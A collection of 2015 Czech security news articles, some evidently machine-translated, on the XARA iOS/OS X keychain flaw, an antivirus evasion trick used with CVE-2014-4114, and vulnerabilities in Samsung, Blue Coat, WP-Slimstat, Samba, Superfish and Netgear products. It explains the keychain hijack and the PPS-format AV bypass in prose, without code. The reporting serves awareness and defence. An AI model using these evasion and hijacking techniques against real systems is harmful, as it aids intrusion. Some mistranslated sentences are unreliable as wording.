Posledních pár dnů, papír s detaily o Xara zranitelnosti v OS X a iOS je stále hodně pozornosti [1]. Pokud jste ho ještě neviděli termín "Xara" před, pak je to pravděpodobně proto, že cross-aplikace-resource-přístup byl normální v minulosti. Různé aplikace má přístup k navzájem na údaje, pokud stejný uživatel spustil je. Ale v poslední době, operační systémy, jako OS X a iOS dělal pokusy "pískoviště" aplikací a izolovat aplikace od sebe, i když stejný uživatel běží jim.

Tyto pískoviště měly zabránit jedinou škodlivý aplikace v ohrožení celý systém.

iOS používá písek-boxoval aplikace výhradně jako omezuje instalace aplikace do App Store. V OS X, aplikace stažené z App Store, musí zavést písek-box. Ale uživatelé stále moci stahovat libovolné aplikace, které nepoužívají písek-box. Například, jeden z důvodů, neexistují žádné účinné anti-malware aplikací pro iOS je, že neexistuje žádný způsob, jak načíst aplikaci, která by mít oprávnění, aby prováděli inspekce jiných aplikací.

Nicméně, aplikace je třeba ještě mluvit s každým jiný, a vývojáři používat různé metody, které nabízí operační systém pro odesílání dat k sobě navzájem. Tento dokument se nastínit, jak některé z těchto metod lze použít pro přístup k dalším aplikacím mimo tam zamýšleném rozsahu.

Chcete-li vysvětlit na příkladu, budu používat přístup "Přívěsek na klíče", která způsobila pravděpodobně nejvíce titulky. Pro ostatní, a pro více informací, naleznete v původním dokumentu.

Pokud aplikace by chtěli uložit heslo do iOS nebo OS X klíčenka, je třeba vytvořit novou položku. Aplikace zkontroluje, zda vstup je to s názvem již existuje. K dispozici jsou dvě možnosti:

- Hodnota dosud neexistuje (poprvé uživatel nastaví heslo v této žádosti)

V tomto případě, bude aplikace vytvořit nový záznam. To má možnost zajistit ji pouze poskytováním některých aplikací přístup k hodnotě. Například, pokud budeme publikovat několik aplikací, pak bychom mohli dovolit všichni z našich aplikací pro přístup k této položky.

- Hodnota již existuje (uživatel již nakonfigurován heslo)

V tomto případě, pokud aplikace má přístup k položce, může přepsat nebo číst ji. Pokud jiná aplikace náhodou použít stejný název, pak položka by měla být uzamčena, pokud tato jiná aplikace implementována Keychain položku správně.

Nicméně, škodlivý aplikace, pokud spustíte před žádosti o oběti, může nastavit položku hesla se stejným názvem jako aplikace oběti pokud oběť neměla konfigurovat ještě heslo. Škodlivá aplikace by pak vytvořit položku, která je otevřená do aplikace oběti a samozřejmě zůstává otevřená ke škodlivému aplikace.

Jak již bylo zmíněno dříve, Keychain je jen jedním z rysů, kteří trpí problémy s křížovým přístupem aplikací zdrojů. Z větší části, to musí být stanovena podle operačního systému, a může požadovat pozměňující rozhraní API, které nemusí být zpětně kompatibilní. Dále, vývojáři aplikací může být schopen přidat nějaké zmírnění, ale není jasné, jaké metody bude pracovat pro různé případy zneužívání Xara.

Jako běžný koncový uživatel, jediná věc, kterou můžete udělat, je být opatrný na to, co aplikace, které nainstalujete. Pro iOS, může Apple k jeho procesu přezkumu aplikace přidat další položky, Kontrolní seznam, ale autoři papíru se podařilo publikovat důkaz pojetí aplikace.

Pro vězení rozbité iOS zařízení, nebo pro OS X uživatelé instalují boxoval non-písek aplikací, tuto chybu zabezpečení nepředstavuje žádná nová rizika. Mobilní malware zejména je stále poněkud neobvyklé.

[1] https://drive.google.com/file/d/0BxxXk1d3yyuZOFlsdkNMSGswSGs/view

CVE-2014-4114 a Zajímavá AV Bypass Technika

19.6.2015 Zranitelnosti
Citizenlabs nedávno hlášeny na CVE-2014-4114 kampaň proti prodemokratických / pro-tibetské skupiny v Hong Kongu. Útoky děje by nemělo nikoho překvapit, ani že útoky byly sofistikované. Zranitelnost sám byl záplatované s MS14-060 a byl používán apt a trestné činnosti skupiny pro někdy. Trend Micro napsal dobrou zápisu-up problému zde .

Co je zajímavé, je to, co ve skutečnosti, je anti-virus bypass, který byl zaměstnán u herců. Tento obtok byl projednán v této zprávě (prohlášení o vyloučení odpovědnosti, z mé pracovní den). V krátkosti, když CVE-2014-4114 zneužití kódu byla uvedena do PPSX souboru generovaných využít sady, to vyvolalo AV. Když byl stejný soubor uložen jako PPS soubor, tytéž AV motory zastavit odhalovat ji. Formát PPSX souboru (Powerpoint formát slideshow / XML) je modernější formát. Formát PPS byla použita v Office 97-2003 ve formátu OLE. Přestože AV motory zastavit detekci nebezpečný dokument, využívat kód běžel bez problému.

První stánek s jídlem je, samozřejmě, záplatovat vaše systémy a je s podivem, kolik cílené politické organizace se zdá citlivé na činech, které měly patche se celé měsíce.

Druhým je, stejný škodlivý kód může být zastoupen rozdílně v různých typů souborů a její důležité, aby pokrytí těchto jiných formátů, aby zajistila kompletní ochranu.

Apple iOS má obří bezpečnostní chybu. Dovolí obejít i ukrást hesla

18.6.2015 Zranitelnosti

Tým z univerzit v Indianě, Pekingu a Georgii zveřejnil práci, která popisuje masivní bezpečnostní chybu v operačních systémech Applu – jedná se jak o mobilní iOS, tak o počítačový Mac OS X.

Výzkumníci postupovali tak, že vytvořili nenápadně se tvářící aplikaci, která obsahovala malware. Škodlivá část kódu byla tak dobře schovaná, že prošla kontrolou Applu a dostala se do běžné nabídky App Storu. Po nainstalování malware využívá způsob, jakým spolu v rámci systému komunikují jednotlivé aplikace. Umožňuje nejen obcházet hesla, ale také je získat. Může jít o hesla k iCloud, mailovým účtům a dalším službám včetně bankovnictví. Malware se dostane i k dalším datům, které mají být striktně utajená.

431292688
Tým zkoušel svůj postup na řadě nejpoužívanějších aplikací z Apple App Storu a napadnout se povedlo 89 % z nich. Byly mezi nimi také aplikace 1Password a Google Chrome, které schraňují hesla k dalším službám. Schéma útoku se týká aplikace Evernote.
Vedoucí týmu Luyi Xing řekl, že chybu objevili a experiment provedli před mnoha měsíci a veškeré informace předali Applu. Protože se jedná o problém s hloubkovou strukturou systémů, vzal si Apple šest měsíců na vyřešení. Půl roku je pryč (mimochodem mezitím vzniká iOS 9), chyba přetrvává, a tak se výzkumníci rozhodli chybu zveřejnit.

Telefony Samsung Galaxy obsahují závažné bezpečnostní riziko

18.6.2015 Zranitelnosti
Smartphony řady Galaxy jihokorejské společnosti Samsung obsahují závažnou bezpečnostní díru, díky které na ně mohou útočníci na dálku nainstalovat škodlivý kód nebo odposlouchávat hovory.
Telefony Samsung Galaxy obsahují závažné bezpečnostní riziko

Americká společnost NowSecure zveřejnila zprávu, podle které software Swift předinstalovaný na více než 600 milionech zařízeních Samsungu obsahuje díru, jež útočníkům na dálku umožňuje monitorovat trafik uživatele a spouštět na jeho telefonu škodlivé kódy.

Špatnou zprávou je, že aplikaci Swift není možné z telefonu odinstalovat a útočníci mohou díru zneužít i tehdy, pokud uživatel tento software nepoužívá.

Swift má na telefonech řady Galaxy přístup k většině jejich funkcí. Útočník tedy může na zařízení nic netušícího uživatele tajně nainstalovat červa, přistupovat k jeho fotoaparátu, mikrofonu a GPS, odposlouchávat hovory, nechat si přeposílat textové zprávy, či dokonce měnit nastavení aplikací.

Představitelé NowSecure tvrdí, že na chybu upozornili Samsung již v prosinci minulého roku a kromě toho o ní byl vyrozuměn i americký Computer Emergency Readiness Team (CERT) a vývojářský tým Googlu, který pracuje na Androidu. Samsung údajně začal mobilním operátorům distribuovat patch „na počátku roku 2015“, však neví se, kolik z nich aktualizaci poskytlo svým zákazníkům.

Na seznamu potenciálně nebezpečných zařízení jsou i vlajkové lodě Samsungu jako Galaxy S6, S5, S4 či S4 mini.

Jelikož není možné Swift odinstalovat, uživatelé by se podle NowSecure měli vyhýbat nezabezpečeným Wi-Fi sítím a/nebo používat jiné mobilní zařízení. Jak podotkli experti z NowSecure, aplikace SwiftKey dostupná v Google Play, jež je založena na stejném SDK, nemá se Swiftem žádnou spojitost a její instalace či smazání nemá na přítomnost díry vliv. To potvrdil i CMO Swiftkey Joe Bradwood.

„Swift je technologie, kterou dodáváme Samsungu, přičemž na této technologii je postaven systém předpovídání slov, které uživatel píše na klávesnici. Problém však není přímo ve Swiftu ale ve způsobu, jakým je tato technologie do zařízení Samsungu integrována,“ uvedl Bradwood s tím, že zmíněná díra není příliš riziková.

„Uživatel musí být připojen k určité síti, kde čeká hacker připravený se do zařízení nabourat.“

Google bude vyplácet až 750 tisíc korun za díry nalezené v Androidu

18.6.2015 Zranitelnosti
Google rozšiřuje Vulnerability Reward Program, v jehož rámci platí vývojářům za bezpečnostní díry nalezené v jeho webových službách a aplikacích, i na svůj operační systém Android.

Vulnerability Reward Program se nebude vztahovat na všechna androidová zařízení, ale jen na ta, za něž je Google stoprocentně odpovědný a jež jsou v současné době dostupná na trhu.

To konkrétně znamená, že vývojáři mohou hledat díry pouze u zařízení Nexus 6 a Nexus 9. Podle Googlu je tak Nexus „první řadou mobilních zařízení, která je zapojena do obdobného programu“.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »

Google bude vývojářům a dalším IT expertům platit nejen za objevené chyby, ale i za to, pokud s popisem chyby získá i reálný příklad jejího zneužití a/nebo návrh na její záplatu. Odměny se mohou v závislosti na komplexnosti díry vyšplhat až na dva tisíce dolarů (cca 50 000 Kč), přičemž pokud vývojáři poskytnou i zmíněný příklad jejího zneužití či patch, může se finanční kompenzace vyšplhat až na 8000 dolarů (200 000 Kč).

Kromě toho bude Google vyplácet nadstandardní bonusy tehdy, pokud se vývojářům v Androidu podaří proniknout do kernelu, TEE (TrustZone) či procesu Verified Boot. Za průnik do TrustZone či Verified Boot Google vyplatí odměnu ve výši až 30 000 dolarů (750 000 Kč).

Google na svém oficiálním blogu uvedl, že jen za poslední rok vývojářům v rámci programu Vulnerabilty Reward vyplatil přes 1,5 milionu dolarů. Kromě toho představitelé amerického gigantu dodali, že v budoucnu plánují dotovat i různé hackerské soutěže podobné Pwn2Own, které se budou týkat Androidu.

Zero day útoky se používají i proti menším firmám

15.6.2015 Zranitelnosti
Ekosystém počítačového zločinu dnes zahrnuje prakticky veškeré potřebné komponenty, na černém trhu lze koupit nebo pronajmout vše. Pokročilé postupy útoků již nevyžadují žádné vlastní technické znalosti. Objevovaných zranitelností je tolik, že se nevyplatí si je šetřit na speciální cíle a útočníci si mohou dovolit je nasazovat plošně. Vážně ohroženy jsou organizace všech velikostí.
Zero day útoky se používají i proti menším firmám

V posledních měsících bylo provedeno několik průzkumů a studií, jejichž výsledky ukazují na aktuální trendy kybernetické kriminality. Ačkoliv stále více výrobců softwaru za nalézání a reportování bezpečnostních chyb platí, mnoho zranitelností nultého dne (zero day) se stále dostává i do rukou podvodníků.

Trh je tak rozvinutý, že stejná zranitelnost bývá zpravidla objevena i prodána vícekrát nezávisle na sobě. Podvodníkům se pak nevyplatí chyby si šetřit na zvlášť důležité cíle, nejvíce vydělá ten, kdo s akcí přijde jako první – brzy poté zareagují dodavatelé zabezpečení a další pokusy o zneužití už nebudou tak účinné. I malé firmy se tak stále častěji stávají terčem sofistikovaných útoků.

Rychlé infekce

Analýza společnosti Verizon se zaměřila na účinnost phishgingu, což je při útocích stále jedna z nejčastěji používaných metod. Ačkoliv se s phishingem pro jeho všudypřítomnost setkal snad každý, tato metoda překvapivě neztrácí na efektivitě.

Podle Verizonu je v podnikovém prostředí dnes phishing účinný především kvůli tomu, že některá oddělení mají otevírání a reakce i na nevyžádané e-maily v popisu práce. Zaměstnanci technické podpory, právního oddělení či vztahů s veřejností mají prostě za úkol otevírat i nevyžádané e-maily od neznámých adresátů, nelze je vyškolit, aby to nedělali. I když vzdělávání uživatelů má v mixu obranných technik své místo, potřeba je nasazovat i adekvátní technické prostředky.

Závěry studie také ukazují, že oběti na phishing naletí obvykle velmi rychle, už v řádu minut po zahájení útoku. Z toho důvodu nelze plně spoléhat na definice malwaru. Než se bezpečnostní systém stihne aktualizovat, infekce je často již v plném proudu. Výhodu zde ale mají ti, kdo používají řešení fungující efektivně na principech cloudu a rozšířené po celém světě – díky tomu lze informace sdílet podstatně rychleji. Například základna produktů Avast představuje asi 230 milionů uživatelů.

Vše k pronajmutí

Studie Websense 2015 Threat Report uvádí, že počítačová kriminalita dnes prakticky plně kopíruje legální softwarové trhy. Malware i infrastruktura (řídicí servery, ovládané botnety...) se přeprodávají, prodává se software i služba, na černém trhu funguje marketing a je k dispozici technická podpora produktů. Útočník proto zdaleka nemusí mít všechny potřebné technické dovednosti, vše si může snadno koupit i pronajmout.

Podle statistik organizace AV-Test bylo v posledních 2 letech vytvořeno více nového malwaru než za celé předešlé desetiletí. Opět z toho vyplývá, že bezpečnostní řešení, která rozpoznávají škodlivý kód na základě definic (signatur) ztrácejí svou účinnost a úroveň ochrany potřebnou v podnikové sféře poskytnou pouze moderní nástroje založené na behaviorální analýze.

Aktualizace nestačí

Zero day útoky a účinný phishing znamenají, že firmy jsou ohroženy, i když si pečlivě aktualizují svůj software. Velký význam v této souvislosti získávají filtry, které blokují škodlivé weby, podezřelé odkazy v sociálních sítích, rozpoznávají e-maily podle jejich obsahu a analyzují jejich přílohy.

Moderní bezpečnostní produkty se rovněž snaží škodlivé kódy nejprve spouštět ve virtuálních prostředích (sandboxech). Ani tyto metody ochrany ale nejsou 100% účinné. V poslední době čím dál víc malwaru při svém spuštění testuje, zda neběží ve virtuálním stroji nebo sandboxu, a v takovém případě se škodlivé chování často vůbec neaktivuje.

Za situace, kdy 100% bezpečnost těžko zajistit, je třeba volit priority. Některé části firemní sítě si zaslouží speciální ochranu, obsahují např. kritická data nebo zálohy z koncových zařízení, na která cílí stále populárnější ransomware. Vedle zabezpečení koncových bodů by podniky proto měly také zvážit nasazení speciálních řešení na úrovni serverů. Společnost Avast zde nabízí aplikace pro ochranu e-mailových i souborových serverů a speciálně pro MS Exchange, SharePoint a Small Business Server.

Renesance makrovirů

K dalším trendům kybernetické kriminality patří dnes makroviry. Jedná se o metodu starou a málem zapomenutou, která ale v současnosti zažívá renesanci. Na rozdíl od spustitelných souborů nebývají dokumenty s makry běžně blokovány na úrovni e-mailové brány. Uživatele je obvykle třeba přimět k povolení maker metodami sociálního inženýrství. V některých prostředích pak bývají makra ale povolena standardně – často jde o finanční či analytická oddělení podniku, která pro útočníky samozřejmě představují zvlášť zajímavý cíl.

KRITICKÁ IE AKTUALIZACE JEDEN Z OSMI BULLETINECH ZABEZPEČENÍ SPOLEČNOSTI MICROSOFT

10.6.2015 Zranitelnosti

IT administrátorům dnes byly relativně lehký měsíc udělena bulletinů zabezpečení od společnosti Microsoft, který je pravděpodobně třeba uvítat vzhledem k tomu, Windows Server 2003, podpora zabezpečení končí v trochu více než měsíc. Společnost Microsoft dnes vydala osm bulletinů, dva z nich hodnotili kritická, včetně dnes již obvyklé svalnatý aktualizaci Internet Explorer. Dva tuctu zranitelnosti byly řešeny v nejnovější kumulativní aktualizace pro IE, MS15-056 , pořádný kus těchto vad kritická v novějších verzích prohlížeče. Většina zranitelností umožňuje vzdálené spuštění kódu; jeden zveřejňování informací chyba byla veřejně známá, ale Microsoft uvedl, že si není vědoma využije ve volné přírodě. Microsoft uvedl, že veřejně známá chyba umožňuje útočníkovi přístup k historii prohlížeče uživatele; aktualizace brání historii prohlížeče před přístupem na škodlivé stránky. Vada nemá vliv na instalace Windows Serveru, protože ti běží ve výchozím nastavení Rozšířené nastavení zabezpečení, která je omezeném režimu, který snižuje šance webového obsahu prováděný na serveru. "I když by útočník mohl téměř jistě číst historii procházení po využití některého z dalších desítek zranitelností zapojená v tomto měsíci, se zdá pravděpodobné, aby mi, že zpřístupnění informací se bude snadněji zneužít než jakékoliv poškození paměti chyba," řekl Craig Young , bezpečnostní výzkumník v Tripwire.

Young také volá jeden z paměťových chyb, CVE-2015-1756, který je hodnocena jako důležitá společností Microsoft v MS15-060 . Chyba je zranitelnost use-after-zdarma v Microsoft společné prvky subsystému, která by mohla umožnit vzdálené spuštění kódu, pokud uživatel pracuje s nebezpečným obsahem přes IE a potom vyvolá F12 nástroje pro vývojáře v IE. "Tato chyba představuje zajímavou útoku vektor pro jít po výzkumníky využívajících Internet Explorer" Nástroje pro vývojáře "analyzovat škodlivého špatného fungování webových stránek," řekl Young. IE bulletin rovněž řeší tři zvýšení oprávnění nedostatků a dlouhý seznam korupčních paměti zranitelnosti, které umožňují útočníkovi spustit kód na počítači oběti. Druhý kritický bulletin, MS15-057 , nášivky vzdálené spuštění kódu chybu v programu Windows Media Player. Škodlivý obsah média vykonán zranitelné přehrávačem médií by mohl útočník úplnou kontrolu nad počítačem uživatele, řekl Microsoft. Bulletin je hodnocen důležité pro Windows Media Player 10 v systému Windows Server 2003, Windows Media Player 11 na Windows Vista nebo Windows Server 2008, a Windows Media Player 12 v systému Windows 7 nebo Server 2008 R2. Microsoft uvedl, že řešit, jak hráč zvládá DataObjects opravit zranitelnost. Microsoft udělal poskytly jednu řešení, která zahrnuje odstranění Wmplayer.exe z IE ElevationPolicy.

Zranitelnost Windows Media Player byla hlášena prostřednictvím koordinované zveřejňování zranitelnosti, řekl Microsoft, dodává, že si není vědoma veřejných útoků využívajících tuto chybu. Zbývající bulletiny jsou hodnoceny důležité společností Microsoft: MS15-059 záplaty tři souvisejících s pamětí vzdálené spuštění kódu chyby zabezpečení aplikace Microsoft Office, z nichž žádná byly veřejně využíván. MS15-061 záplaty 11 zvýšení oprávnění zranitelností ve Windows Ovladače režimu jádra. MS15-062 záplaty jedno zvýšení oprávnění Chyba zabezpečení služby Active Directory Federation Services, která by mohla vést k cross-site skriptování útoky. MS15-063 záplaty jedno zvýšení oprávnění zranitelnosti v jádře systému Windows. Útočník by musel klesnout nebezpečný DLL soubor v místním adresáři, který by být provedeny programem načítání knihovny. MS15-064 záplaty tři Zvýšení úrovně oprávnění zranitelnosti v Microsoft Exchange Server 2013. Jedna z chyb je server-side žádost padělek vada, zatímco jiný je cross-site vydání požadavku padělání. Finále chyba je injekce HTML chyba vede k zpřístupnění informací. Společnost Microsoft také vydala dvě samostatné bezpečnostní informační zprávy, z nichž jedna aktualizace Flash Player v aplikaci Internet Explorer , řešení bezpečnostních zranitelností již opravené Adobe dříve v den, zatímco ostatní aktualizace Juniper Networks Windows V balení Junos Pulse Client for Windows 8.1 a 8.1 RT . Junos Pulse je VPN dodáván s Windows 8.1 a novější. Aktualizace záplaty tzv Freak zranitelnost a další otázky OpenSSL v Junos Pulse

Blue Coat: zranitelnosti SSL Viditelnost Appliance web bázi

31.5.2015 Zranitelnosti
Blue Coat vydala informační zpravodaj zabezpečení pro Visibility Appliance SSL. SSL Viditelnost Appliance je náchylná k několika webových zranitelností v administrační konzoli. Vzdálený útočník může použít tyto chyby zabezpečení získat přístup pro správu SSL Viditelnost Appliance. Všechny verze SSL Viditelnost před 3.8.4 jsou zranitelné.

Chyby existují v WebUI jsou:

Žádost o Cross-Site Padělek (CVE-2015-2852): Požadavek Cross-site padělání (CSRF) zranitelnost v komponentě WebUI v Blue Coat SSL viditelnosti spotřebiče SV800, SV1800 SV2800, a SV3800 3.6.x přes 3.8.x před 3,8. 4 umožňuje vzdáleným útočníkům unést ověření správců.

Clickjacking kvůli nevhodnému vstupu validaci (CVE-2015-2854): složka WebUI v Blue Coat SSL viditelnosti spotřebiče SV800, SV1800 SV2800, a SV3800 3.6.x přes 3.8.x před 3.8.4 neodesílá omezující X-Frame -options HTTP hlavičky, která umožňuje vzdáleným útočníkům provádět clickjacking útoky přes vektorů zahrnujících element IFRAME.

Krádež Cookie (CVE-2015-2855): složka WebUI v Blue Coat SSL viditelnosti spotřebiče SV800, SV1800 SV2800, a SV3800 3.6.x přes 3.8.x před 3.8.4 nenastaví zabezpečené příznak pro cookie správce v https zasedání, což usnadňuje vzdáleným útočníkům zachytit tento soubor cookie zachytí jeho přenos v rámci http zasedání, které se jiný zranitelnost CVE-2015-4138, než.

Fixace Session (CVE-2015-2853):. Session fixace zranitelnost v komponentě WebUI v Blue Coat SSL viditelnosti spotřebiče SV800, SV1800 SV2800, a SV3800 3.6.x přes 3.8.x před 3.8.4 umožňuje vzdáleným útočníkům zneužít webových relací tím, že poskytuje ID relace.

Řešení:

Omezit přístup k portu pro správu SSL viditelnost důvěryhodným klientům s omezeným přístupem k vnějšímu internetu. SSLV může být nakonfigurován tak, aby omezení IP adresy, které jsou schopny přístupu k řízení port.

Omezit administrativní kapacity přiřazením odlišné role pro různé typy správců.

Použijte ProxySG a WebPulse zablokovat přístup na nebezpečné webové servery od klientů.

Patche:

SSL Viditelnost
SSLV 3.8 - oprava je k dispozici v 3.8.4.
SSLV 3.8.2f - nebude poskytována oprava. Prosím, upgrade na nejnovější verzi s zranitelnost opravit.
SSLV 3.7.4 - nebude poskytovaných fix. Prosím, upgrade na nejnovější verzi s zranitelnosti oprava.

Pro další podrobnosti:

https://bto.bluecoat.com/security-advisory/sa96
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2852
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2853
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2854
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2855

Nenechte se zaskočit zranitelnými servery

21.5.2015 Zranitelnosti
Ve firemní infrastruktuře se objevily nezáplatované stroje, které jsou navíc dostupné z internetu. Jak se to mohlo stát?

Právě se našlo 30 serverů, za které nikdo nenesl odpovědnost. Třicet serverů dostupných z internetu bez ochrany proti malwaru a bez instalovaných záplat. Musím se uklidnit a zjistit, jak špatné to je a co můžeme udělat, aby se takové situace již nikdy neopakovaly.

Vyšlo to najevo, protože shromažďuji metriky, které mohu prezentovat našemu šéfovi IT při jeho čtvrtletní kontrole. Je mezi nimi mimo jiné i počet našich nespravovaných prostředků. To je číslo, u kterého vždy budeme chtít vidět pokles.

Úplná eliminace nespravovaných prostředků je pravděpodobně mimo naše možnosti, nicméně aspoň je chci dostat do našeho vývojového prostředí a udržet je mimo demilitarizovanou zónu, která je částí sítě vystavující aplikace a infrastrukturu okolnímu světu.

Naše produkční prostředí je za firewallem, který mu tak zajišťuje ochranu před sítí oddělení výzkumu a vývoje, kterou sám nazývám „velmi Divokým západem“.

Snažili jsme se přimět personál z tohoto oddělení, aby lépe spravoval své prostředky, ale pracovníci mají tolik izolovaných požadavků, že to zkrátka nelze plnit. Než abychom bojovali v bitvě, kterou nemůžeme nikdy vyhrát, umístili jsme jejich zdroje za jejich vlastní firewall a nastavili pravidla, která omezují, co jejich prostředky mohou dělat a kam mohou přistupovat.

Protože si ale myslím, že jsme tak silní, jak silný je náš nejslabší článek, důrazně prosazuji správu konfigurace v naší produkční síti. Cílem je dodržení této zásady u prostředků dostupných z internetu.

Metrika nespravovaných prostředků se vytváří skenováním prostřednictvím produktu Nessus a porovnáním s údaji, které nám provozní personál sdělí ohledně možné správy. Rozdíl tvoří počet nespravovaných systémů.

Objevené zranitelné servery

Samozřejmě mě šokovalo, že Nessus objevil 30 serverů dostupných z internetu, které se neobjevují na správní konzoli našich podnikových systémů. Hned, jak jsem se probral z úvodního šoku, jsme zkontrolovali tyto servery ručně.

Kromě selhání v oblasti malwaru a záplat (žádné aktualizace za více než šest měsíců) jsme také zjistili, že některé z těchto nespravovaných prostředků jsou linuxové servery s nainstalovanými kompilátory open source kódu.

Některé z nich dokonce měly spuštěné výchozí služby, které jsou přinejmenším riskantní, jako jsou třeba Telnet nebo FTP.

A ještě zbývá zjistit, kdo tyto servery provozuje. E-mail s touto otázkou, zaslaný veškerému IT personálu, zůstal bez odpovědi. Dobře, takže dalším krokem je vypnutí portů přepínačů, ke kterým jsou tyto servery připojené, a uvidí se, kdo se ozve.

Trvalo to déle než tři dny, ale nakonec někdo z jednoho podnikového oddělení přece jen provoznímu týmu IT zavolal. Ukázalo se, že poskytovali servery zákazníkovi kvůli ověření nějakého konceptu.

Toto oddělení to mohlo udělat díky tomu, že jeden z jeho správců býval členem IT týmu a stále měl přístup pro Lab Manager, což je server centralizované správy sloužící ke spouštění virtuálních strojů.

Tento správce navíc uvedl, že si myslel, že Lab Manager umístil servery jen do sítě oddělení výzkumu a vývoje a ne do demilitarizované zóny.

Jaké je poučení?

V tomto příběhu tedy nefiguruje žádný padouch, ale zcela zjevně u nás existují určité procesní nedostatky. Podle našich zásad mělo dojít při odchodu správce z oddělení IT ke změně hesla pro Lab Manager.

Dále jsme měli nedokumentované servery se zákaznickými daty, což odporuje přijatým bezpečnostním zásadám. Proč ale nedošlo k žádnému upozornění e-mailem nebo k jiným oznámením z Lab Manageru, že došlo k poskytnutí serverů?

Chci také zjistit, proč zprovozněné servery neodpovídaly instalaci naší předdefinované výchozí bitové kopii, která obsahuje náš software pro správu systémů, záplaty, antivirový software a zabezpečený operační systém.

Napadá mě ještě jedna další otázka: Proč nám náš systém SIEM (Security Information and Event Management, správa událostí a informací zabezpečení) nenahlásil, že se v naší demilitarizované zóně objevily nové IP adresy? Tím se určitě budu muset vážně zabývat.

WordPress obsahuje kritickou chybu, ohrožené jsou miliony webů

25.2.2015 Zranitelnosti
Více než milion webových stránek, které běží na platformě WordPress, je vystavených potenciálním útokům hackerů, kteří zneužívají zranitelnost v doplňku zvaném WP-Slimstat.

Všechny dřívější verze Slimstatu kromě té aktuální (3.9.6) obsahují jednoduchý klíč, jenž je možné uhodnout. Tento klíč je podle společnosti Sucuri využíván k podepisování odesílaných a přijímaných dat z počítačů koncových uživatelů.

Útočníci v důsledku toho mohou použít speciální techniku, která umožňuje získat vysoce citlivá data včetně šifrovaných hesel a šifrovacích klíčů používaných ke vzdálené správě webových stránek.

„Pokud u své webové stránky používáte starší verzi tohoto přídavku, riskujete,“ uvedl Marc-Alexandre Montpas ze Sucuri. „Úspěšné zneužití této díry by mohlo vyústit v tzv. útoky typu Blind SQL Injection, díky nimž by útočník mohl získat citlivé informace z vaší databáze včetně uživatelského jména, (zašifrovaného) hesla a v některých případech také bezpečnostního klíče WordPress (což by mohlo v konečném důsledku znamenat kompletní převzetí správy nad vaším webem),“ uvedla Sucuri v příspěvku na svém blogu.

Jak dodávají bezpečnostní experti, útočník by mohl využít Internetový archiv k zjištění toho, v kterém roce byla stránka zprovozněna. Díky tomu by mu stačilo otestovat pouze několik desítek milionů kombinací, což by zvládl během necelých deseti minut. Jakmile útočník získá klíč, může začít "tahat" data z databáze.

WP-Slimstat je analytický nástroj, který si podle WordPressu stáhl již více než milion lidí. Pokud je to i váš případ, měli byste tento přídavek ihned aktualizovat na novější verzi.

Samba zranitelnost - Vzdálené spuštění kódu - (CVE-2015 do 0240)
25.2.2015 Zranitelnosti

Bezpečnostní tým Red Hat vydala informační zpravodaj na Samba zranitelnost provádějící Samba verze 3.5.0 přes 4.2.0rc4. "To může být zneužita škodlivý Samba klienta zasláním speciálně vytvořený pakety na Samba serveru. Není nutná žádná ověření se zneužít. Může to vést k dálkově řízeným spuštění libovolného kódu jako root." [1]

Patch [2], byl propuštěn týmem Samba řešit zranitelnost.

[1] https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/

[2] https://www.samba.org/samba/history/security.html

Lenovo instalovalo na své laptopy nebezpečný software

22.2.2015 Zranitelnosti
Čínská společnost Lenovo přiznala, že na své notebooky předinstalovávala software, který vystavoval uživatele riziku potenciálního útoku hackerů a uvedla, že v brzké době vydá nástroj, pomocí kterého bude možné zmíněnou aplikaci odstranit.

„Ve svém týmu mám nyní řadu inženýrů, kteří si připadají opravdu trapně,“ uvedl včera v rozhovoru CTO Lenova Peter Hortensius. „Toto opravdu nezvládli.“ Problém se týká aplikace s názvem Superfish, kterou Lenovo instalovalo na své laptopy od září minulého roku. Ta totiž nejenže vkládá produktová doporučení do výsledků hledání, ale je pro uživatele také závažným bezpečnostním rizikem.

Program si totiž „pohrává“ se šifrovaným webovým trafikem, když ukládá své vlastní SSL certifikáty do oblasti ve Windows, která je využívána k ukládání SSL certifikátů webovými prohlížeči a dalšími aplikacemi. Podle bezpečnostních expertů pak útočníci mohou - jakmile se uživatel připojí k veřejné Wi-Fi nebo síti ovládané hackery - poměrně jednoduše získat k certifikátu klíč. O tomto útoku jako první informoval Robert Graham ze společnosti Errata Security.

Jak uvedl Hortensius, fakt, že uživatelé jsou díky Superfish vystaveni možnému útoku, je neakceptovatelný a Lenovo si rizika až do jejího zveřejnění nebylo vědomo. Čínská společnost tak nyní „pracuje na nápravě“. Lenovo již zveřejnilo pro uživatele instrukce, pomocí kterých mohou Superfish odstranit a brzy vydá speciální nástroj, který program odinstaluje a smaže jím vytvořené certifikáty. Tento nástroj by mohl být vydán již dnes.

Lenovo také zkoumá, zda by nástroj nebylo možné vydat jako automatický patch ve spolupráci s jeho partnery jako Microsoft a McAfee. Jak dodal Hortensius, Lenovo také zavede mechanismy, které mají zajistit, aby se podobná chyba již nikdy neopakovala.

„Chceme detailněji prověřit všechny programy, které jsou předinstalovány na našich systémech a nedopustíme, aby se tyto dostaly k uživatelům, pokud si budeme jen z části myslet, že by mohly být závadné,“ dodal Hortensius. V mezidobí Lenovo řeší možnostih nápravy problému způsobeného Superfish s výrobci prohlížečů a antivirů.

Výrobci prohlížečů nejspíše umístí certifikáty vytvořené Superfish na své blacklisty. Problém je však v tom, že existují jiné programy využívající šifrování - například VPN klienti - které využívají knihovnu Windows k ověření pravosti certifikátů. Ty tak mohou být také náchylné k útoku, pokud certifikáty Superfish nebudou ze systému zcela odstraněny.

„Nezbývá, než říci, že toto jsme opravdu nezvládli. Nesnažíme se to skrývat. Snažíme se udělat všechno, co je v našich silách, k vyřešení tohoto problému,“ dodal Hortensius s tím, že Superfish byl předinstalován pouze na některých laptopech, které se v obchodech objevily mezi zářím a lednem. Společnost přestala aplikaci na své počítače instalovat poté, co si na něj stěžovala řada uživatelů.

Routery Netgearu vyzradí heslo administrátora

17.2.2015 Zranitelnosti

Pokud používáte routery Netgear WNDR3700v4 (V1.0.0.4SH nebo V1.0.1.52), WNR2200 (V1.0.1.88) nebo Netgear WNR2500 (V1.0.0.24), měli byste zbystřit. V podezření jsou i NetGear WNDR3800, Netgear WNDRMAC, NetGear WPN824N a NetGear WNDR4700.

